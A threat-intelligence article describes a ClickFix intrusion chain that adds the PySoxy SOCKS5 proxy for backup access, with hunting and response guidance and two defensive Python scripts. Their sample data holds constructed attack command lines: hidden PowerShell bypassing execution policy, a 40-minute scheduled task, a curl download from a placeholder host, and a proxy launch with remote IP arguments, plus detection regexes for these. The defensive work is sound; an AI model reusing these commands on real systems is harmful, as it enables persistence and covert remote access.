ClickFix Attacks Add PySoxy Proxy to Maintain Access After Initial Compromise


A ClickFix attack chain observed by ReliaQuest shows how the social engineering technique is evolving from a one-time user mistake into a more durable intrusion method. In this case, attackers combined malicious PowerShell execution with PySoxy, an open-source Python SOCKS5 proxy tool, to create a second route back into a compromised Windows host.

The attack began with a familiar ClickFix lure. A compromised website displayed a fake prompt that convinced the user to paste and run a PowerShell command. After that command executed, the attackers created persistence, performed reconnaissance, opened a PowerShell-based command-and-control channel, and later deployed PySoxy as a backup access path.

The key lesson for defenders is clear: blocking one callback does not always end a ClickFix incident. If a scheduled task, staged script, Python runtime, or proxy component remains on the endpoint, the attack can keep trying to reconnect long after network security tools block the first connection.

What makes this ClickFix campaign different

ClickFix attacks usually rely on social engineering rather than a traditional software exploit. The victim sees a fake browser, CAPTCHA, update, or troubleshooting prompt and follows instructions that run a command on the local machine.

That first step already gives attackers code execution. What makes the ReliaQuest case more serious is the follow-up activity. The attackers did not rely on a single PowerShell callback. They built a layered access chain with persistence and a second proxy-based route.

ReliaQuest said this was the first time it had seen ClickFix combined with PySoxy in an active intrusion. The campaign shows how attackers can turn a simple copy-and-paste lure into a post-exploitation workflow that looks closer to pre-ransomware access.

Attack stage       | Observed behavior
-------------------|------------------------------------------------------------------------------
Initial lure       | A compromised website tricked the user into running a PowerShell command.
Execution          | The command launched from explorer.exe and started a multi-stage PowerShell chain.
Persistence        | A scheduled task relaunched a staged script from C:\ProgramData about every 40 minutes.
First access path  | A PowerShell-based remote access script polled attacker infrastructure for commands.
Reconnaissance     | Attackers checked domain status, group memberships, domain controllers, and nearby systems.
Second access path | PySoxy was executed through Python bytecode to create a proxy-based connection.

How PySoxy fits into the attack

PySoxy is not new malware. It is a small open-source SOCKS5 proxy server written in Python. That makes this attack more difficult for defenders because the tool itself has legitimate or educational uses.

In the observed incident, attackers downloaded Python tooling into C:\ProgramData and executed a compiled Python bytecode file. The command line included proxy-style arguments such as -ssl, -remote_ip, and -remote_port.

This turned the compromised endpoint into a second communication path. Even if defenders blocked the PowerShell C2 channel, the PySoxy route could continue providing proxy access unless responders removed the local persistence and staged components.

Why scheduled tasks made the attack harder to contain

The scheduled task changed the incident from a short-lived execution event into a repeating compromise attempt. ReliaQuest observed that the task kept relaunching the malicious activity after defenders blocked outbound connections.

This matters because many teams treat a blocked callback as containment. In this case, the host still had local instructions to restart the chain. The attacker did not need the first connection to stay alive forever.

For incident responders, that means the endpoint must be isolated and inspected. Analysts should not only block infrastructure. They should remove scheduled tasks, staged scripts, Python files, bytecode, and any other component that can relaunch the activity.

  • Blocking C2 traffic may stop communication temporarily.
  • Local persistence can restart the attack chain later.
  • PySoxy can create a separate proxy channel with different traffic patterns.
  • Python bytecode in ProgramData should raise suspicion during a ClickFix investigation.
  • Containment should include endpoint cleanup, not only network blocking.

ClickFix is moving deeper into post-exploitation

ClickFix started as a social engineering technique that relied on user action. Attackers used fake prompts to convince people to run malicious commands in PowerShell, Windows Run, Terminal, or similar tools.

Microsoft has warned that ClickFix can bypass some conventional defenses because the user launches the command manually. Microsoft has also observed ClickFix campaigns delivering infostealers, remote access tools, loaders, rootkits, and other malware families.

The PySoxy case shows another direction. Instead of only delivering a known malware payload, attackers used built-in Windows behavior, scripts, scheduled tasks, and an older open-source proxy to build access that blends into administrative activity.

Why this matters for ransomware defense

ClickFix can give attackers an easy starting point. A user runs the command, and the attacker quickly receives code execution on a corporate endpoint. From there, the next steps often involve reconnaissance, credential access, lateral movement, and data staging.

The ReliaQuest case included domain reconnaissance and SMB activity against discovered systems. That behavior fits the early stages of hands-on-keyboard intrusion activity, where attackers try to understand the environment before moving deeper.

Ransomware affiliates often value access methods that survive early containment. A ClickFix chain with scheduled tasks and a proxy backup can give them more time to investigate the network and prepare follow-up activity.

Defender concern           | Why it matters
---------------------------|----------------------------------------------------------------------------
User-launched command      | Security tools may see execution as user initiated rather than exploit driven.
PowerShell abuse           | Attackers can run commands, fetch payloads, and avoid dropping obvious executables.
Scheduled task persistence | The attack can restart after processes stop or connections fail.
Proxy tooling              | A second channel can help attackers maintain access through different infrastructure.
Reconnaissance             | Domain and SMB discovery can precede lateral movement and ransomware staging.

What SOC teams should hunt for

Security teams should hunt for sequences, not isolated events. A single PowerShell command may not tell the whole story. The stronger signal comes when PowerShell execution is followed by writes to C:\ProgramData, scheduled task creation, curl downloads, Python execution, and outbound proxy-style connections.

Analysts should also review PowerShell processes launched with arguments such as -NoProfile, -ExecutionPolicy Bypass, and -WindowStyle Hidden. These options often appear in low-visibility execution chains.

For PySoxy-related activity, defenders should search for python.exe running compiled .pyc files with proxy arguments. Command-line terms such as -ssl, -remote_ip, -remote_port, SOCKS, and .pyc can help identify suspicious execution.

  • PowerShell launched after a browser or explorer.exe event.
  • Scheduled tasks created shortly after suspicious PowerShell activity.
  • Scripts staged in C:\ProgramData or other non-standard directories.
  • curl downloads to attacker-controlled infrastructure.
  • python.exe executing .pyc files.
  • Command-line arguments tied to proxy behavior.
  • LDAP, SMB, and domain controller discovery after the initial ClickFix event.
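As an added example (not code from the article or from ReliaQuest), the Python script below shows one way to hunt for the sequence rather than the isolated events. It classifies process-creation records into the stages the article describes and raises a finding only when low-visibility PowerShell launched from explorer.exe or a browser is followed on the same host, within an hour, by scheduled task creation, a curl download into C:\ProgramData, or python.exe running a .pyc file with the -ssl, -remote_ip or -remote_port arguments. The event field names, hostnames, file names and the 203.0.113.10 address are constructed for this example; the switches and proxy arguments are the ones the article names.

```python
"""Hunt for the ClickFix -> persistence -> Python proxy sequence in process events.

Added example, not code from the article or from ReliaQuest. Event field names,
hostnames, file paths and the 203.0.113.10 address are constructed for this demo.
"""
import re
from datetime import datetime, timedelta

# Parents that suggest a user-launched (pasted) command rather than an admin tool.
LAUNCHERS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Low-visibility PowerShell switches named in the article, plus their short forms.
LOW_VIS_ARGS = re.compile(
    r"-(?:noprofile|nop\b|executionpolicy\s+bypass|ep\s+bypass|windowstyle\s+hidden|w\s+hidden)",
    re.I,
)
# Proxy-style arguments the article reports on the PySoxy command line.
PROXY_ARGS = re.compile(r"-(?:ssl|remote_ip|remote_port)\b", re.I)
PROGRAMDATA = re.compile(r"C:\\ProgramData\\", re.I)

# Constructed sample events, shaped like reduced Sysmon Event ID 1 records.
SAMPLE_EVENTS = [
    {"time": "2025-01-10T09:00:00", "host": "WS01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\\ProgramData\\s1.ps1"},
    {"time": "2025-01-10T09:00:12", "host": "WS01", "parent": "powershell.exe", "image": "schtasks.exe",
     "cmdline": 'schtasks.exe /Create /SC MINUTE /MO 40 /TN Updater /TR "powershell -w hidden -File C:\\ProgramData\\upd.ps1"'},
    {"time": "2025-01-10T09:02:40", "host": "WS01", "parent": "powershell.exe", "image": "curl.exe",
     "cmdline": "curl.exe -o C:\\ProgramData\\py\\py.zip http://203.0.113.10/py.zip"},
    {"time": "2025-01-10T09:05:03", "host": "WS01", "parent": "powershell.exe", "image": "python.exe",
     "cmdline": "C:\\ProgramData\\py\\python.exe C:\\ProgramData\\py\\p.pyc -ssl -remote_ip 203.0.113.10 -remote_port 443"},
    # Ordinary activity on a second host; nothing here should be correlated.
    {"time": "2025-01-10T09:10:00", "host": "WS02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-Service"},
    {"time": "2025-01-10T11:00:00", "host": "WS02", "parent": "cmd.exe", "image": "python.exe",
     "cmdline": "python.exe build.py"},
]


def classify(ev):
    """Map one process-creation event to the attack stage it resembles, or None."""
    image, cmd = ev["image"].lower(), ev["cmdline"]
    if image == "powershell.exe" and ev["parent"].lower() in LAUNCHERS and LOW_VIS_ARGS.search(cmd):
        return "execution"
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        return "persistence"
    if image == "curl.exe" and PROGRAMDATA.search(cmd):
        return "download"
    if image == "python.exe" and re.search(r"\.pyc\b", cmd, re.I) and PROXY_ARGS.search(cmd):
        return "proxy"
    return None


def correlate(events, window=timedelta(minutes=60)):
    """Group tagged events per host and chain the stages that follow each execution event."""
    by_host = {}
    for ev in events:
        stage = classify(ev)
        if stage:
            by_host.setdefault(ev["host"], []).append((datetime.fromisoformat(ev["time"]), stage, ev))

    findings = []
    for host, tagged in by_host.items():
        tagged.sort(key=lambda t: t[0])
        for i, (t0, stage, _) in enumerate(tagged):
            if stage != "execution":
                continue
            chain = ["execution"]
            for t1, s1, _ in tagged[i + 1:]:
                if t1 - t0 > window:
                    break
                if s1 not in chain:
                    chain.append(s1)
            if len(chain) >= 2:  # PowerShell alone is not a finding; a follow-up stage is.
                severity = "high" if "proxy" in chain or "persistence" in chain else "medium"
                findings.append({"host": host, "start": t0.isoformat(), "stages": chain, "severity": severity})
        # Python bytecode with proxy arguments is worth a finding even if the opening PowerShell was missed.
        for t0, stage, _ in tagged:
            if stage == "proxy" and not any(f["host"] == host and "proxy" in f["stages"] for f in findings):
                findings.append({"host": host, "start": t0.isoformat(), "stages": ["proxy"], "severity": "high"})
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

Run against real telemetry, the same two-level design applies: cheap per-event classifiers feed a per-host window, so a benign `powershell.exe Get-Service` never reaches the correlator, while a lone python.exe proxy launch still surfaces on its own.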

Incident responders should treat this kind of ClickFix activity as a potential full compromise, not as a simple user error. The affected machine should be isolated before analysts begin cleanup.

Next, teams should review scheduled tasks, staged scripts, Python files, and related process history. They should remove all persistence mechanisms and confirm that no proxy process remains active.

Network blocks still matter, but they should come with host-level cleanup. Otherwise, a scheduled task may continue trying to relaunch the script, and a second access route may remain available.

  1. Isolate the affected endpoint from the network.
  2. Review recent PowerShell execution history.
  3. Check scheduled tasks created after the suspected ClickFix event.
  4. Inspect C:\ProgramData for staged scripts, Python files, and .pyc files.
  5. Search for python.exe command lines using -ssl, -remote_ip, or -remote_port.
  6. Block known attacker infrastructure across DNS, proxy, firewall, and EDR controls.
  7. Review domain reconnaissance, SMB access, and lateral movement attempts.
  8. Reset credentials if the endpoint handled privileged sessions or sensitive access.
  9. Reimage the host if persistence or attacker activity cannot be fully removed.
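As an added example (not code from the article, ReliaQuest or the PySoxy project), the Python script below supports steps 3 to 5 of this checklist against exported task definitions. It parses the Windows Task Scheduler XML that `schtasks /Query /XML` or the files under C:\Windows\System32\Tasks produce, pulls out each action's command line and any repetition interval, and flags tasks that launch from C:\ProgramData or similar user-writable paths, run PowerShell with low-visibility switches, execute .pyc files or carry the -ssl, -remote_ip or -remote_port arguments, or repeat on a short cycle such as the roughly 40-minute interval ReliaQuest observed. The two task definitions, their authors, paths and timestamps are constructed; the `since` timestamp is an assumed input marking the suspected ClickFix event.

```python
"""Triage exported Windows scheduled task XML for ClickFix-style persistence.

Added example, not code from the article, ReliaQuest or the PySoxy project.
Both task definitions below are constructed; names, paths and times are
placeholders. Real exports (schtasks /Query /XML, or files under
C:\\Windows\\System32\\Tasks) are UTF-16 text: decode them before parsing.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Directories an unprivileged user can write to; vendor tasks rarely launch from them.
STAGING_DIRS = re.compile(r"ProgramData|AppData|\\Temp\\|\\Users\\Public", re.I)
LOW_VIS = re.compile(
    r"-(?:noprofile|nop\b|executionpolicy\s+bypass|ep\s+bypass|windowstyle\s+hidden|w\s+hidden)", re.I)
PROXY_ARGS = re.compile(r"-(?:ssl|remote_ip|remote_port)\b", re.I)

SUSPECT_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2025-01-10T09:00:12</Date>
    <Author>WS01\user</Author>
  </RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition>
        <Interval>PT40M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2025-01-10T09:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoProfile -WindowStyle Hidden -File C:\ProgramData\upd.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Example Vendor</Author></RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2024-06-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\Example Vendor\updater.exe</Command>
      <Arguments>/silent</Arguments>
    </Exec>
  </Actions>
</Task>"""


def _text(elem, path):
    """Stripped text of the first namespaced child matching path, or ''."""
    node = elem.find(path, NS)
    return (node.text or "").strip() if node is not None else ""


def iso_duration_minutes(value):
    """Convert the ISO 8601 durations Task Scheduler writes (PT40M, P1DT2H, ...) to minutes."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value)
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def parse_task(xml_text):
    """Extract author, registration time, Exec actions and the shortest repetition interval."""
    root = ET.fromstring(xml_text)
    actions = [(_text(e, "t:Command"), _text(e, "t:Arguments")) for e in root.findall("t:Actions/t:Exec", NS)]
    intervals = [iso_duration_minutes(_text(r, "t:Interval")) for r in root.findall("t:Triggers/*/t:Repetition", NS)]
    return {
        "author": _text(root, "t:RegistrationInfo/t:Author"),
        "registered": _text(root, "t:RegistrationInfo/t:Date"),
        "actions": actions,
        "min_interval": min((i for i in intervals if i is not None), default=None),
    }


def score_task(task):
    """Return the list of indicators a parsed task matches (empty for an unremarkable task)."""
    reasons = []
    for command, args in task["actions"]:
        line = f"{command} {args}"
        if STAGING_DIRS.search(line):
            reasons.append("action runs from a user-writable staging directory")
        if re.search(r"powershell|pwsh", command, re.I) and LOW_VIS.search(line):
            reasons.append("PowerShell with low-visibility arguments")
        if re.search(r"python", command, re.I) and re.search(r"\.pyc\b", line, re.I):
            reasons.append("Python executing compiled bytecode")
        if PROXY_ARGS.search(line):
            reasons.append("proxy-style arguments")
    if task["min_interval"] is not None and task["min_interval"] <= 60:
        reasons.append(f"repeats every {task['min_interval']:g} minutes")
    return reasons


def triage(task_xmls, since=None):
    """Return (author, registered, reasons) for each task with at least one indicator.
    since: optional ISO timestamp of the suspected ClickFix event; later registrations are flagged."""
    findings = []
    for xml_text in task_xmls:
        task = parse_task(xml_text)
        reasons = score_task(task)
        if since and task["registered"] and task["registered"] >= since:
            reasons.append(f"registered after the suspected ClickFix event ({since})")
        if reasons:
            findings.append((task["author"], task["registered"], reasons))
    return findings


if __name__ == "__main__":
    for author, registered, reasons in triage([SUSPECT_TASK_XML, BENIGN_TASK_XML], since="2025-01-10T08:55:00"):
        print(author, registered, reasons)
```

Each indicator is weak on its own (plenty of legitimate tasks repeat hourly), which is why the script reports the full list of reasons per task rather than a verdict: a task that combines a ProgramData path, hidden PowerShell and a short repeat cycle registered minutes after the pasted command is the one to remove and document before the host is reconnected.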

How organizations can reduce ClickFix risk

User awareness remains important, but it cannot be the only control. Employees should know that legitimate websites should not ask them to paste commands into PowerShell, Windows Run, Terminal, or Command Prompt.

Administrators should also restrict scripting where possible. Controls such as PowerShell logging, Constrained Language Mode, attack surface reduction rules, application allowlisting, and endpoint detection can reduce the chance that a copied command becomes a full intrusion.

Organizations should also baseline approved remote access, proxy, and scripting tools. Attackers increasingly abuse legitimate or open-source tools because they can look less suspicious than traditional malware.

Control                      | Purpose
-----------------------------|------------------------------------------------------------------
User training                | Warn users never to run commands copied from web prompts.
PowerShell logging           | Capture command lines, script blocks, and suspicious execution patterns.
Application allowlisting     | Limit unauthorized Python, proxy, and scripting tools.
Scheduled task monitoring    | Detect new persistence created after suspicious execution.
Egress controls              | Restrict outbound traffic to unknown servers and unusual ports.
Endpoint isolation playbooks | Contain hosts quickly when ClickFix moves into post-exploitation.

Bottom line

The ClickFix and PySoxy combination shows how attackers can use simple social engineering to start a more resilient intrusion. A user runs one command, but the attacker builds persistence, reconnaissance, and redundant access behind it.

For defenders, the response must move beyond blocking a bad IP address. SOC teams need to inspect the host, remove scheduled tasks, delete staged payloads, review Python execution, and confirm that no second communication path remains.

ClickFix incidents now deserve the same urgency as other initial access events. When attackers add persistence and proxy access, a single pasted command can become the start of a broader compromise.

FAQ

What is ClickFix?

ClickFix is a social engineering technique where attackers trick users into copying and running malicious commands, often through fake browser, CAPTCHA, update, or troubleshooting prompts.

What is PySoxy?

PySoxy is an open-source Python SOCKS5 proxy tool. In the observed attack, attackers abused it to create a second communication path from a compromised endpoint to attacker-controlled infrastructure.

Why is the ClickFix and PySoxy combination dangerous?

The combination is dangerous because attackers can keep a backup access route even after defenders block the first PowerShell-based command-and-control channel. Scheduled tasks can also relaunch malicious scripts repeatedly.

How should SOC teams respond to a ClickFix incident?

SOC teams should isolate the endpoint, review PowerShell execution, inspect scheduled tasks, check C:\ProgramData for staged scripts, hunt for Python bytecode execution, block attacker infrastructure, and investigate possible lateral movement.

How can organizations prevent ClickFix attacks?

Organizations can reduce risk by training users not to run commands from web prompts, logging PowerShell activity, restricting script execution, monitoring scheduled tasks, limiting unauthorized Python tools, and enforcing application allowlisting.
